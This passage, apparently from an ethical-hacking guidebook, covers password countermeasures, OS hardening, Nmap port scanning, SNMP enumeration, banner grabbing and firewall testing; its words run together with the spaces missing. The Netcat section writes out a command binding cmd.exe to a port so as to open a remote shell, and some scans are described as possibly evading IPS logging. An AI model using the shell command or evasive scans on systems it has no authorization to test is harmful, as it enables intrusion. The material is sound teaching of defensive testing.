n’treusethesamepasswordwithinatleastfourtofivepasswordchanges.

Usepassword-protectedscreensavers.Unlockedscreensareagreatwayforsystemstobecompromised.Youcouldhavethestrongestpasswordsandbestfulldiskencryptionintheworld,butnoneofthatmattersifthecomputerisleftunattendedwiththescreenunlocked.Don’tsharepasswords.Toeachhisorherown!Avoidstoringuserpasswordsinanunsecuredcentrallocation,suchasanunprotectedspreadsheetonaharddrive.Thisisaninvitationfordisaster.Useapasswordmanagertostoreuserpasswordsifyou’rewilling.I’mnot,justyet.

TakingothercountermeasuresHerearesomeotherpasswordhackingcountermeasuresthatIrecommend:

Enablesecurityauditingtohelpmonitorandtrackpasswordattacks.

Testyourapplicationstomakesuretheyaren’tstoringpasswordsindefinitelyinmemoryorwritingthemtodisk.AgoodtoolforthisisWinHex(www.winhex.com/winhex/index-m.html).I’veusedthistooltosearchacomputer’smemoryforpassword,pass=,login,andsoonandhavecomeupwithsomepasswordsthatthedevelopersthoughtwereclearedfrommemory.

Somepassword-crackingTrojan-horseapplicationsaretransmittedthroughwormsorsimplee-mailattachments.Suchmalwarecanbelethaltoyourpassword-protectionmechanismsifthey’reinstalledonyoursystems.Thebestdefenseismalwareprotectionorwhitelistingsoftware,fromWebroot,McAfee,orBit9.

Keepyoursystemspatched.Passwordsareresetorcompromisedduringbufferoverflowsorotherdenialofservice(DoS)conditions.KnowyouruserIDs.Ifanaccounthasneverbeenused,deleteordisabletheaccountuntilit’sneeded.YoucandetermineunusedaccountsbymanualinspectionorbyusingatoolsuchasDumpSec(www.systemtools.com/somarsoft/?somarsoft.com),atoolthatcanenumeratetheWindowsoperatingsystemandgatheruserIDsandotherinformation.

Asthesecuritymanagerinyourorganization,youcanenableaccountlockouttopreventpassword-crackingattempts.Accountlockoutistheabilitytolockuseraccountsforacertaintimeafteracertainnumberoffailedloginattemptshasoccurred.Mostoperatingsystems(andsomeapplications)havethiscapability.Don’tsetittoolow(fewerthanfivefailedlogins),anddon’tsetittoohightogiveamalicioususeragreaterchanceofbreakingin.Somewherebetween5and50mightworkforyou.Iusuallyrecommendasettingofaround10or15.Considerthefollowingwhenconfiguringaccountlockoutonyoursystems:

TouseaccountlockouttopreventanypossibilitiesofauserDoScondition,require

http://www.winhex.com/winhex/index-m.html

http://www.systemtools.com/somarsoft/?somarsoft.com

twodifferentpasswords,anddon’tsetalockouttimeforthefirstoneifthatfeatureisavailableinyouroperatingsystem.Ifyoupermitautoresetoftheaccountafteracertainperiod—oftenreferredtoasintruderlockout—don’tsetashorttimeperiod.Thirtyminutesoftenworkswell.

Afailedlogincountercanincreasepasswordsecurityandminimizetheoveralleffectsofaccountlockoutiftheaccountexperiencesanautomatedattack.Alogincountercanforceapasswordchangeafteranumberoffailedattempts.Ifthenumberoffailedloginattemptsishighandoccurredoverashortperiod,theaccounthaslikelyexperiencedanautomatedpasswordattack.

Otherpassword-protectioncountermeasuresinclude

Strongerauthenticationmethods.Examplesofthesearechallenge/response,smartcards,tokens,biometrics,ordigitalcertificates.Automatedpasswordreset.Thisfunctionalityletsusersmanagemostoftheirpasswordproblemswithoutgettingothersinvolved.Otherwise,thissupportissuebecomesexpensive,especiallyforlargerorganizations.Password-protectthesystemBIOS.Thisisespeciallyimportantonserversandlaptopsthataresusceptibletophysicalsecuritythreatsandvulnerabilities.

SecuringOperatingSystemsYoucanimplementvariousoperatingsystemsecuritymeasurestoensurethatpasswordsareprotected.

Regularlyperformtheselow-techandhigh-techpassword-crackingteststomakesurethatyoursystemsareassecureaspossible—perhapsaspartofamonthly,quarterly,orbiannualauditoflocalanddomainpasswords.

WindowsThefollowingcountermeasurescanhelppreventpasswordhacksonWindowssystems:

SomeWindowspasswordscanbegleanedbysimplyreadingthecleartextorcrackableciphertextfromtheWindowsRegistry.Secureyourregistriesbydoingthefollowing:

Allowonlyadministratoraccess.Hardentheoperatingsystembyusingwell-knownhardeningbestpractices,suchasthosefromSANS(www.sans.org),NIST(http://csrc.nist.gov),theCenterforInternetSecurityBenchmarks/ScoringTools(www.cisecurity.org),andtheonesoutlinedinNetworkSecurityForDummiesbyCheyCobb.

KeepallSAMdatabasebackupcopiessecure.

DisablethestorageofLMhashesinWindowsforpasswordsthatareshorterthan15characters.

Forexample,youcancreateandsettheNoLMHashregistrykeytoavalueof1underHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa.

UselocalorgroupsecuritypoliciestohelpeliminateweakpasswordsonWindowssystemsbeforethey’recreated.DisablenullsessionsinyourWindowsversionorenabletheWindowsFirewall.InWindowsXPandlaterversions,enabletheDoNotAllowAnonymousEnumerationofSAMAccountsandSharesoptioninthelocalsecuritypolicy.

Chapter12coversWindowshacksyouneedtounderstandandtestinmoredetail.

LinuxandUNIXThefollowingcountermeasurescanhelppreventpasswordcracksonLinuxandUNIXsystems:

EnsurethatyoursystemisusingshadowedMD5passwords.

http://www.sans.org/

http://csrc.nist.gov

http://www.cisecurity.org/

Helppreventthecreationofweakpasswords.Youcanuseeitherthebuilt-inoperatingsystempasswordfiltering(suchascracklibinLinux)orapassword-auditingprogram(suchasnpasswdorpasswd+).Checkyour/etc/passwdfileforduplicaterootUIDentries.Hackerscanexploitsuchentriestogainbackdooraccess.

Chapter13explainstheLinuxhacksandhowtotestLinuxsystemsforvulnerabilities.

PartIII

HackingNetworkHosts

Readmoreabouthowyoucanfindtheareasofyournetworkthatarecreatingbusinessrisksatwww.dummies.com/extras/hacking.


Inthispart…Nowthatyou’reoffandrunningwithyoursecuritytests,it’stimetotakethingstoanewlevel.Thetestsinthepreviouspart—atleastthesocialengineeringandphysicalsecuritytests—startatahighlevelandarenotthattechnical.Times,theyarea-changin’!Younowneedtolookatnetworksecurity.Thisiswherethingsstartgettingmoreinvolved.

Thispartstartsbylookingatthenetworkfromtheinsideandtheoutsideforperimetersecurityholes,networkdeviceexploits,DoSvulnerabilities,andmore.ThispartthenlooksathowtoassessthesecurityofwirelessLANsthatintroducesomeserioussecurityvulnerabilitiesintonetworksthesedays.Finally,thispartdelvesintotheever-growingnumberofmobiledevicesthatemployeesusetoconnecttothenetworkastheyplease.

Chapter9

NetworkInfrastructureSystemsInThisChapter

Selectingtools

Scanningnetworkhosts

Assessingsecuritywithanetworkanalyzer

Preventingdenial-of-serviceandinfrastructurevulnerabilities

Tohavesecureoperatingsystemsandapplications,youneedasecurenetwork.Devicessuchasrouters,firewalls,andevengenericnetworkhosts(includingserversandworkstations)mustbeassessedaspartofthesecuritytestingprocess.

Therearethousandsofpossiblenetworkvulnerabilities,equallyasmanytools,andevenmoretestingtechniques.Youprobablydon’thavethetimeorresourcesavailabletotestyournetworkinfrastructuresystemsforallpossiblevulnerabilities,usingeverytoolandmethodimaginable.Instead,youneedtofocusonteststhatwillproduceagoodoverallassessmentofyournetwork—andthetestsIdescribeinthischapterproduceexactlythat.

Youcaneliminatemanywell-known,network-relatedvulnerabilitiesbysimplypatchingyournetworkhostswiththelatestvendorsoftwareandfirmwareupdates.Becausemanynetworkinfrastructuresystemsaren’tpubliclyaccessible,oddsaregoodthatyournetworkhostswillnotbeattackedfromtheoutside.Youcaneliminatemanyothervulnerabilitiesbyfollowingsomesolidsecuritypracticesonyournetwork,asdescribedinthischapter.Thetests,tools,andtechniquesoutlinedinthischapterofferthemostbangforyoursecurityassessmentbuck.

Thebetteryouunderstandnetworkprotocols,theeasiernetworkvulnerabilitytestingisbecausenetworkprotocolsarethefoundationformostinformationsecurityconcepts.Ifyou’realittlefuzzyonhownetworkswork,IhighlyencourageyoutoreadTCP/IPForDummies,6thEdition,byCandaceLeidenandMarshallWilensky.TCP/IPForDummiesisoneoftheoriginalbooksthathelpedmedevelopmyfoundationofnetworkingconceptsearlyon.TheRequestforComments(RFCs)listontheOfficialInternetProtocolStandardspage,www.rfc-editor.org/search/standards.php,isagoodreferenceaswell.

http://www.rfc-editor.org/search/standards.php

UnderstandingNetworkInfrastructureVulnerabilities

Networkinfrastructurevulnerabilitiesarethefoundationformosttechnicalsecurityissuesinyourinformationsystems.Theselower-levelvulnerabilitiesaffectpracticallyeverythingrunningonyournetwork.That’swhyyouneedtotestforthemandeliminatethemwheneverpossible.

Yourfocusforsecuritytestsonyournetworkinfrastructureshouldbetofindweaknessesthatotherscanseeinyournetworksoyoucanquantifyandtreatyournetwork’slevelofexposure.

Manyissuesarerelatedtothesecurityofyournetworkinfrastructure.Someissuesaremoretechnicalandrequireyoutousevarioustoolstoassessthemproperly.Youcanassessotherswithagoodpairofeyesandsomelogicalthinking.Someissuesareeasytoseefromoutsidethenetwork,andothersareeasiertodetectfrominsideyournetwork.

Whenyouassessyourcompany’snetworkinfrastructuresecurity,youneedtolookatthefollowing:

Wheredevices,suchasafirewalloranIPS,areplacedonthenetworkandhowthey’reconfiguredWhatexternalattackersseewhentheyperformportscansandhowtheycanexploitvulnerabilitiesinyournetworkhostsNetworkdesign,suchasInternetconnections,remoteaccesscapabilities,layereddefenses,andplacementofhostsonthenetworkInteractionofinstalledsecuritydevices,suchasfirewalls,intrusionpreventionsystems(IPSs),antivirus,andsoonWhatprotocolsareinuse,includingknownvulnerableonessuchasSecureSocketsLayer(SSL)CommonlyattackedportsthatareunprotectedNetworkhostconfigurationsNetworkmonitoringandmaintenance

Ifsomeoneexploitsavulnerabilityinoneoftheitemsintheprecedinglistoranywhereinyournetwork’ssecurity,badthingscanhappen:

Anattackercanlaunchadenialofservice(DoS)attack,whichcantakedownyourInternetconnection—oryourentirenetwork.

Amaliciousemployeeusinganetworkanalyzercanstealconfidentialinformationine-mailsandfilessentoverthenetwork.Ahackercansetupback-dooraccessintoyournetwork.Acontractorcanattackspecifichostsbyexploitinglocalvulnerabilitiesacrossthenetwork.

Beforeassessingyournetworkinfrastructuresecurity,remembertodothefollowing:

Testyoursystemsfromtheoutsidein,andtheinsidein(thatis,onandbetweeninternalnetworksegmentsanddemilitarizedzones[DMZs]).Obtainpermissionfrompartnernetworkstocheckforvulnerabilitiesontheirsystemsthatcanaffectyournetwork’ssecurity,suchasopenports,lackofafirewall,oramisconfiguredrouter.

ChoosingToolsAswithallsecurityassessments,yournetworksecuritytestsrequiretherighttools—youneedportscanners,protocolanalyzers,andvulnerabilityassessmenttools.Greatcommercial,shareware,andfreewaretoolsareavailable.Idescribeafewofmyfavoritetoolsinthefollowingsections.Justkeepinmindthatyouneedmorethanonetoolbecausenotooldoeseverythingyouneed.

Ifyou’relookingforeasy-to-usesecuritytoolswithall-in-onepackaging,yougetwhatyoupayformostofthetime—especiallyfortheWindowsplatform.Tonsofsecurityprofessionalsswearbymanyfreesecuritytools,especiallythosethatrunonLinuxandotherUNIX-basedoperatingsystems.Manyofthesetoolsofferalotofvalue—ifyouhavethetime,patience,andwillingnesstolearntheirinsandouts.It’dbehooveyoutocomparetheresultsofthefreetoolswiththatoftheircommercialcounterparts.I’vedefinitelyfoundsomebenefitstousingthelatter.

ScannersandanalyzersThesescannersprovidepracticallyalltheportscanningandnetworktestingyouneed:

Cain&Abel(www.oxid.it/cain.html)fornetworkanalysisandARPpoisoningEssentialNetTools(www.tamos.com/products/nettools)forawidevarietyofnetworkscanningfunctionalityNetScanToolsPro(www.netscantools.com)fordozensofnetworksecurityassessmentfunctions,includingpingsweeps,portscanning,andSMTPrelaytestingGetif(www.wtcs.org/snmp4tpc/getif.htm)anoldiebutgoodietoolforSNMPenumerationNmap(http://nmap.org)—orNMapWin(http://sourceforge.net/projects/nmapwin),thehappy-clicky-GUIfrontendtoNmap—forhost-portprobingandoperatingsystemfingerprintingSavviusOmniPeek(www.savvius.com)fornetworkanalysisWireshark(www.wireshark.org)fornetworkanalysis

VulnerabilityassessmentThesevulnerabilityassessmenttools,amongothers,allowyoutotestyournetworkhostsforvariousknownvulnerabilitiesaswellaspotentialconfigurationissuesthatcouldleadtosecurityexploits:


http://www.tamos.com/products/nettools/

http://www.netscantools.com/

http://www.wtcs.org/snmp4tpc/getif.htm

http://nmap.org/




GFILanGuard(www.gfi.com/products-and-solutions/network-security-solutions/gfi-languard)forportscanningandvulnerabilitytestingNexpose(www.rapid7.com/vulnerability-scanner.jsp),anall-in-onetoolforin-depthvulnerabilitytesting

http://www.gfi.com/products-and-solutions/network-security-solutions/gfi-languard

http://www.rapid7.com/vulnerability-scanner.jsp

Scanning,Poking,andProddingtheNetwork

Performingtheethicalhacksdescribedinthefollowingsectionsonyournetworkinfrastructureinvolvesfollowingbasichackingsteps:

1. Gatherinformationandmapyournetwork.2. Scanyoursystemstoseewhichonesareavailable.3. Determinewhat’srunningonthesystemsdiscovered.4. Attempttopenetratethesystemsdiscoveredifyouchooseto.

EverynetworkcarddriverandimplementationofTCP/IPinmostoperatingsystems,includingWindowsandLinux,andeveninyourfirewallsandrouters,hasquirksthatresultindifferentbehaviorswhenscanning,poking,andproddingyoursystems.Thiscanresultindifferentresponsesfromyourvarioussystems,includingeverythingfromfalse-positivefindingstodenialofservice(DoS)conditions.Refertoyouradministratorguidesorvendorwebsitesfordetailsonanyknownissuesandpossiblepatchesthatareavailabletofixthoseissues.Ifyoupatchedallyoursystems,youshouldn’thaveanyissues—justknowthatanything’spossible.

ScanningportsAportscannershowsyouwhat’swhatonyournetworkbyscanningthenetworktoseewhat’saliveandworking.Portscannersprovidebasicviewsofhowthenetworkislaidout.Theycanhelpidentifyunauthorizedhostsorapplicationsandnetworkhostconfigurationerrorsthatcancauseserioussecurityvulnerabilities.

Thebig-pictureviewfromportscannersoftenuncoverssecurityissuesthatmightotherwisegounnoticed.Portscannersareeasytouseandcantestnetworkhostsregardlessofwhatoperatingsystemsandapplicationsthey’rerunning.Thetestsareusuallyperformedrelativelyquicklywithouthavingtotouchindividualnetworkhosts,whichwouldbearealpainotherwise.

Thetricktoassessingyouroverallnetworksecurityisinterpretingtheresultsyougetfromaportscan.Youcangetfalsepositivesonopenports,andyoumighthavetodigdeeper.Forexample,UserDatagramProtocol(UDP)scans—liketheprotocolitself—arelessreliablethanTransmissionControlProtocol(TCP)scansandoftenproducefalsepositivesbecausemanyapplicationsdon’tknowhowtorespondtorandomincomingUDPrequests.

Afeature-richscannersuchasNexposeoftencanidentifyportsandseewhat’srunning

inonestep.

Portscanscantakeagoodbitoftime.Thelengthoftimedependsonthenumberofhostsyouhave,thenumberofportsyouscan,thetoolsyouuse,theprocessingpowerofyourtestsystem,andthespeedofyournetworklinks.

Animportanttenettorememberisthatyouneedtoscanmorethanjusttheimportanthosts.Leavenostoneunturned—ifnotatfirst,theneventually.Theseothersystemsoftenbiteyouifyouignorethem.Also,performthesametestswithdifferentutilitiestoseewhetheryougetdifferentresults.Notalltoolsfindthesameopenportsandvulnerabilities.Thisisunfortunate,butit’sarealityofethicalhackingtests.

Ifyourresultsdon’tmatchafteryourunthetestsusingdifferenttools,youmightwanttoexploretheissuefurther.Ifsomethingdoesn’tlookright—suchasastrangesetofopenports—itprobablyisn’t.Testagain;ifyou’reindoubt,useanothertoolforadifferentperspective.

Ifpossible,youshouldscanall65,534TCPportsoneachnetworkhostthatyourscannerfinds.Ifyoufindquestionableports,lookfordocumentationthattheapplicationisknownandauthorized.It’snotabadideatoscanall65,534UDPportsaswell.Justknowthiscanaddaconsiderableamountoftimetoyourscans.

Forspeedandsimplicity,youcanscanthecommonlyhackedports,listedinTable9-1.

Table9-1CommonlyHackedPorts

PortNumber Service Protocol(s)

7 Echo TCP,UDP

19 Chargen TCP,UDP

20 FTPdata(FileTransferProtocol) TCP

21 FTPcontrol TCP

22 SSH TCP

23 Telnet TCP

25 SMTP(SimpleMailTransferProtocol) TCP

37 Time TCP,UDP

53 DNS(DomainNameSystem) UDP

69 TFTP(TrivialFileTransferProtocol) UDP

79 Finger TCP,UDP

80 HTTP(HypertextTransferProtocol) TCP

110 POP3(PostOfficeProtocolversion3) TCP

111 SUNRPC(remoteprocedurecalls) TCP,UDP

135 RPC/DCE(endpointmapper)forMicrosoftnetworks TCP,UDP

137,138,139,445 NetBIOSoverTCP/IP TCP,UDP

161 SNMP(SimpleNetworkManagementProtocol) TCP,UDP

443 HTTPS(HTTPoverTLS) TCP

512,513,514 Berkeleyr-servicesandr-commands(suchasrsh,rexec,andrlogin) TCP

1433 MicrosoftSQLServer(ms-sql-s) TCP,UDP

1434 MicrosoftSQLMonitor(ms-sql-m) TCP,UDP

1723 MicrosoftPPTPVPN TCP

3389 WindowsTerminalServer TCP

8080 HTTPproxy TCP

PingsweepingApingsweepofallyournetworksubnetsandhostsisagoodwaytofindoutwhichhostsarealiveandkickingonthenetwork.ApingsweepiswhenyoupingarangeofaddressesusingInternetControlMessageProtocol(ICMP)packets.Figure9-1showsthecommandandtheresultsofusingNmaptoperformapingsweepofaclassCsubnetrange.

Figure9-1:PerformingapingsweepofanentireclassCnetworkwithNmap.

DozensofNmapcommandlineoptionsexist,whichcanbeoverwhelmingwhenyouwantonlyabasicscan.Nonetheless,youcanenternmaponthecommandlinetoseealltheoptionsavailable.

ThefollowingcommandlineoptionscanbeusedforanNmappingsweep:

-sPtellsNmaptoperformapingscan.-ntellsNmapnottoperformnameresolution.-T4tellsNmaptoperformanaggressive(faster)scan.

192.168.1.1-254tellsNmaptoscantheentire192.168.1.0subnet.

UsingportscanningtoolsMostportscannersoperateinthreesteps:

1. TheportscannersendsTCPSYNrequeststothehostorrangeofhostsyousetittoscan.

SomeportscannersperformpingsweepstodeterminewhichhostsareavailablebeforestartingtheTCPportscans.

MostportscannersbydefaultscanonlyTCPports.Don’tforgetaboutUDPports.YoucanscanUDPportswithaUDPportscanner,suchasNmap.

2. Theportscannerwaitsforrepliesfromtheavailablehosts.3. Theportscannerprobestheseavailablehostsforupto65,534possibleTCPand

UDPports—basedonwhichportsyoutellittoscan—toseewhichoneshaveavailableservicesonthem.

Theportscansprovidethefollowinginformationaboutthelivehostsonyournetwork:

HoststhatareactiveandreachablethroughthenetworkNetworkaddressesofthehostsfoundServicesorapplicationsthatthehostsmayberunning

Afterperformingagenericsweepofthenetwork,youcandigdeeperintospecifichostsyoufind.

Nmap

Afteryouhaveageneralideaofwhathostsareavailableandwhatportsareopen,youcanperformfancierscanstoverifythattheportsareactuallyopenandnotreturningafalsepositive.Nmapallowsyoutorunthefollowingadditionalscans:

Connect:ThisbasicTCPscanlooksforanyopenTCPportsonthehost.Youcanusethisscantoseewhat’srunninganddeterminewhetherintrusionpreventionsystems(IPSs),firewalls,orotherloggingdeviceslogtheconnections.UDPscan:ThisbasicUDPscanlooksforanyopenUDPportsonthehost.Youcanusethisscantoseewhat’srunninganddeterminewhetherIPSs,firewalls,orotherloggingdeviceslogtheconnections.SYNStealth:Thisscancreatesahalf-openTCPconnectionwiththehost,possiblyevadingIPSsystemsandlogging.ThisisagoodscanfortestingIPSs,firewalls,andotherloggingdevices.FINStealth,XmasTree,andNull:Thesescansletyoumixthingsupabitby

sendingstrangelyformedpacketstoyournetworkhostssoyoucanseehowtheyrespond.ThesescanschangearoundtheflagsintheTCPheadersofeachpacket,whichallowsyoutotesthoweachhosthandlesthemtopointoutweakTCP/IPimplementationsaswellaspatchesthatmightneedtobeapplied.

Becarefulwhenperformingthesescans.YoucancreateyourownDoSattackandpotentiallycrashapplicationsorentiresystems.Unfortunately,ifyouhaveahostwithaweakTCP/IPstack(thesoftwarethatcontrolsTCP/IPcommunicationsonyourhosts),there’snogoodwaytopreventyourscanfromcreatingaDoSattack.AgoodwaytohelpreducethechanceofthisoccurringistousetheslowNmaptimingoptions—Paranoid,Sneaky,orPolite—whenrunningyourscans.

Figure9-2showstheNMapWinScantab,whereyoucanselecttheScanModeoptions(Connect,UDPScan,andsoon).Ifyou’reacommandlinefan,youseethecommandlineparametersdisplayedinthelower-leftcorneroftheNMapWinscreen.Thishelpswhenyouknowwhatyouwanttodoandthecommandlinehelpisn’tenough.

Figure9-2:In-depthport-scanningoptionsinNMapWin.

Ifyouconnecttoasingleport(asopposedtoseveralallatonetime)withoutmakingtoomuchnoise,youmightbeabletoevadeyourfirewallorIPS.Thisisa

goodtestofyournetworksecuritycontrols,solookatyourlogstoseewhattheysawduringthisprocess.

NetScanToolsPro

NetScanToolsPro(www.netscantools.com)isaveryniceall-in-onecommercialtoolforgatheringgeneralnetworkinformation,suchasthenumberofuniqueIPaddresses,NetBIOSnames,andMACaddresses.Italsohasaneatfeaturethatallowsyoutofingerprinttheoperatingsystemsofvarioushosts.Figure9-3showstheOSFingerprintingresultswhilescanningawirelessnetworkaccesspoint.

Figure9-3:NetScanToolsProOSFingerprintingtool.

CountermeasuresagainstpingsweepingandportscanningEnableonlythetrafficyouneedtoaccessinternalhosts—preferablyasfaraspossiblefromthehostsyou’retryingtoprotect—anddenyeverythingelse.Thisgoesforstandardports,suchasTCP80forHTTPandICMPforpingrequests.

Configurefirewallstolookforpotentiallymaliciousbehaviorovertime(suchasthenumberofpacketsreceivedinacertainperiodoftime)andhaverulesinplacetocutoffattacksifacertainthresholdisreached,suchas10portscansinoneminuteor100consecutiveping(ICMP)requests.

MostfirewallsandIPSscandetectsuchscanningandcutitoffinrealtime.

Youcanbreakapplicationsonyournetworkwhenrestrictingnetworktraffic,somakesurethatyouanalyzewhat’sgoingonandunderstandhowapplications


andprotocolsareworkingbeforeyoudisableanytypeofnetworktraffic.

ScanningSNMPSimpleNetworkManagementProtocol(SNMP)isbuiltintovirtuallyeverynetworkdevice.Networkmanagementprograms(suchasHPOpenViewandLANDesk)useSNMPforremotenetworkhostmanagement.Unfortunately,SNMPalsopresentssecurityvulnerabilities.

VulnerabilitiesTheproblemisthatmostnetworkhostsrunSNMPenabledwiththedefaultread/writecommunitystringsofpublic/private.ThemajorityofnetworkdevicesIcomeacrosshaveSNMPenabledanddon’tevenneedit.

IfSNMPiscompromised,ahackermaybeabletogathersuchnetworkinformationasARPtables,usernames,andTCPconnectionstoattackyoursystemsfurther.IfSNMPshowsupinportscans,youcanbetthatamaliciousattackerwilltrytocompromisethesystem.

HerearesomeutilitiesforSNMPenumeration:

ThecommercialtoolsNetScanToolsProandEssentialNetToolsFreeWindowsGUI-basedGetifFreeWindowstext-basedSNMPUTIL(www.wtcs.org/snmp4tpc/FILES/Tools/SNMPUTIL/SNMPUTIL.zip)

YoucanuseGetiftoenumeratesystemswithSNMPenabled,asshowninFigure9-4.

Figure9-4:GeneralSNMPinformationgatheredbyGetif.

Inthistest,Iwasabletogleanalotofinformationfromawirelessaccesspoint,includingmodelnumber,firmwarerevision,andsystemuptime.Allthiscouldbeusedagainstthehostifanattackerwantedtoexploitaknownvulnerabilityinthisparticular

http://www.wtcs.org/snmp4tpc/FILES/Tools/SNMPUTIL/SNMPUTIL.zip

system.Bydigginginfurther,Iwasabletodiscoverseveralmanagementinterfaceusernamesonthisaccesspoint,asshowninFigure9-5.Youcertainlydon’twanttoshowtheworldthisinformation.

Figure9-5:ManagementinterfaceuserIDsgleanedviaGetif’sSNMPbrowsingfunction.

Foralistofvendorsandproductsaffectedbythewell-knownSNMPvulnerabilities,refertowww.cert.org/historical/advisories/CA-2002-03.cfm.

CountermeasuresagainstSNMPattacks

PreventingSNMPattackscanbeassimpleasA-B-C:

AlwaysdisableSNMPonhostsifyou’renotusingit—period.BlocktheSNMPports(UDPports161and162)atthenetworkperimeter.ChangethedefaultSNMPcommunityreadstringfrompublicandthedefaultcommunitywritestringfromprivatetoanotherlongandcomplexvaluethat’svirtuallyimpossibletoguess.

There’stechnicallya“U”that’spartofthesolution:upgrade.Upgradingyoursystems(atleasttheonesyoucan)toSNMPversion3canresolvemanyofthewell-knownSNMPsecurityweaknesses.

GrabbingbannersBannersarethewelcomescreensthatdivulgesoftwareversionnumbersandothersysteminformationonnetworkhosts.Thisbannerinformationmightidentifytheoperatingsystem,theversionnumber,andthespecificservicepackstogivethebad

http://www.cert.org/historical/advisories/CA-2002-03.cfm

guysaleguponattackingthenetwork.YoucangrabbannersbyusingeithergoodoldtelnetorsomeofthetoolsImention,suchasNmapandSuperScan.

telnetYoucantelnettohostsonthedefaulttelnetport(TCPport23)toseewhetheryou’representedwithaloginpromptoranyotherinformation.JustenterthefollowinglineatthecommandpromptinWindowsorUNIX:

telnetip_address

Youcantelnettoothercommonlyusedportswiththesecommands:

SMTP:telnetip_address25HTTP:telnetip_address80POP3:telnetip_address110

Figure9-6showsspecificversioninformationaboutanIceWarpe-mailserverwhentelnettingtoitonport25.Forhelpwithtelnet,simplyentertelnet/?ortelnethelpforspecificguidanceonusingtheprogram.

Figure9-6:Informationgatheredaboutane-mailserverviatelnet.

Countermeasuresagainstbanner-grabbingattacksThefollowingstepscanreducethechanceofbanner-grabbingattacks:

Ifthereisn’tabusinessneedforservicesthatofferbannerinformation,disablethoseunusedservicesonthenetworkhost.Ifthereisn’tabusinessneedforthedefaultbanners,orifyoucancustomizethebanners,configurethenetworkhost’sapplicationoroperatingsystemtoeitherdisablethebannersorremoveinformationfromthebannersthatcouldgiveanattackeralegup.Checkwithyourspecificvendorforinformationonhowtodothis.TCPWrappersinLinuxisanothersolution.

Ifyoucancustomizeyourbanners,checkwithyourlawyeraboutaddingawarningbanner.Itwon’tstopbannergrabbingbutwillshowwould-beintrudersthatthesystemisprivateandmonitored(assumingittrulyis).Awarningbannermayalsohelpreduceyourbusinessliabilityintheeventofasecuritybreach.Here’sanexample:

Warning!Thisisaprivatesystem.Alluseismonitoredandrecorded.Anyunauthorizeduseofthissystemmayresultinciviland/orcriminalprosecutiontothefullestextentofthelaw.

TestingfirewallrulesAspartofyourethicalhacking,youcantestyourfirewallrulestomakesurethey’reworkingasthey’resupposedto.

TestingAfewtestscanverifythatyourfirewallactuallydoeswhatitsaysit’sdoing.Youcanconnectthroughthefirewallontheportsthatareopen,butwhatabouttheportsthatcanbeopenbutshouldn’tbe?

Netcat

Netcat(http://netcat.sourceforge.net)cantestcertainfirewallruleswithouthavingtotestaproductionsystemdirectly.Forexample,youcancheckwhetherthefirewallallowsport23(telnet)through.Followthesestepstoseewhetheraconnectioncanbemadethroughport23:

1. LoadNetcatonaclientmachineinsidethenetwork.

Thissetsuptheoutboundconnection.

2. LoadNetcatonatestingcomputeroutsidethefirewall.

Thisallowsyoutotestfromtheoutsidein.

3. EntertheNetcatlistenercommandontheclient(internal)machinewiththeportnumberyou’retesting.

Forexample,ifyou’retestingport23,enterthiscommand:nc–l–p23cmd.exe

4. EntertheNetcatcommandtoinitiateaninboundsessiononthetesting(external)machine.Youmustincludethefollowinginformation:

TheIPaddressoftheinternalmachineyou’retestingTheportnumberyou’retesting

Forexample,iftheIPaddressoftheinternal(client)machineis10.11.12.2andthe

http://netcat.sourceforge.net/

portis23,enterthiscommand:nc–v10.11.12.223

IfNetcatpresentsyouwithanewcommandprompt(that’swhatthecmd.exeisforinStep3)ontheexternalmachine,you’veconnectedandcanexecutecommandsontheinternalmachine!Thiscanserveseveralpurposes,includingtestingfirewallrules,networkaddresstranslation(NAT),portforwardingand—well,uhhhmmm—executingcommandsonaremotesystem!

AlgoSecFirewallAnalyzer

AcommercialtoolIoftenusewithgreatresultsisAlgoSec’sFirewallAnalyzer(www.algosec.com)asshowninFigure9-7.

Figure9-7:UsingAlgoSecFirewallAnalyzertouncoversecuritygaffesinafirewallrulebase.

AlgoSecFirewallAnalyzer,andsimilaronessuchasSolarWindsFirewallSecurityManager(www.solarwinds.com/firewall-security-manager.aspx),allowsyoutoperformanin-depthanalysisoffirewallrulebasesfromallthemajorvendorsandfindsecurityflawsandinefficienciesyou’dneveruncoverotherwise.Firewallrulebaseanalysisisalotlikesoftwaresourcecodeanalysis—itfindsflawsatthesourcethathumanswouldlikelyneverseeevenwhenperformingin-depthsecuritytestsfromtheInternetandtheinternalnetwork.Ifyou’veneverperformedafirewallrulebaseanalysis,it’samust!

CountermeasuresagainstfirewallrulebasevulnerabilitiesThefollowingcountermeasurescanpreventahackerfromtestingyourfirewall:

http://www.algosec.com/

http://www.solarwinds.com/firewall-security-manager.aspx

Performafirewallrulebaseaudit.I’malwayssayingthatyoucannotsecurewhatyoudon’tacknowledge.There’snobetterexampleofthisthanyourfirewallrulebases.Nomatterhowseeminglysimplisticyourrulebaseis,itneverhurtstoverifyyourworkusinganautomatedtool.

Limittraffictowhat’sneeded.

Setrulesonyourfirewall(androuter,ifneeded)thatpassesonlytrafficthatabsolutelymustpass.Forexample,haverulesinplacethatallowHTTPinboundtraffictoaninternalwebserver,SMTPinboundtraffictoane-mailserver,andHTTPoutboundtrafficforexternalwebaccess.

Thisisthebestdefenseagainstsomeonepokingatyourfirewall.

BlockICMPtohelppreventanexternalattackerfrompokingandproddingyournetworktoseewhichhostsarealive.Enablestatefulpacketinspectiononthefirewalltoblockunsolicitedrequests.

AnalyzingnetworkdataAnetworkanalyzerisatoolthatallowsyoutolookintoanetworkandanalyzedatagoingacrossthewirefornetworkoptimization,security,and/ortroubleshootingpurposes.Likeamicroscopeforalabscientist,anetworkanalyzerisamust-havetoolforanysecurityprofessional.

Networkanalyzersareoftengenericallyreferredtoassniffers,thoughthat’sactuallythenameandtrademarkofaspecificproductfromNetworkAssociates’originalSniffernetworkanalysistool.

Anetworkanalyzerishandyforsniffingpacketsonthewire.Anetworkanalyzerissimplysoftwarerunningonacomputerwithanetworkcard.Itworksbyplacingthenetworkcardinpromiscuousmode,whichenablesthecardtoseeallthetrafficonthenetwork,eventrafficnotdestinedforthenetworkanalyzer’shost.Thenetworkanalyzerperformsthefollowingfunctions:

CapturesallnetworktrafficInterpretsordecodeswhatisfoundintoahuman-readableformatDisplaysthecontentinchronologicalorder(orhoweveryouchoosetoseeit)

Whenassessingsecurityandrespondingtosecurityincidents,anetworkanalyzercanhelpyou

Viewanomalousnetworktrafficandeventrackdownanintruder.

Developabaselineofnetworkactivityandperformance,suchasprotocolsinuse,usagetrends,andMACaddresses,beforeasecurityincidentoccurs.

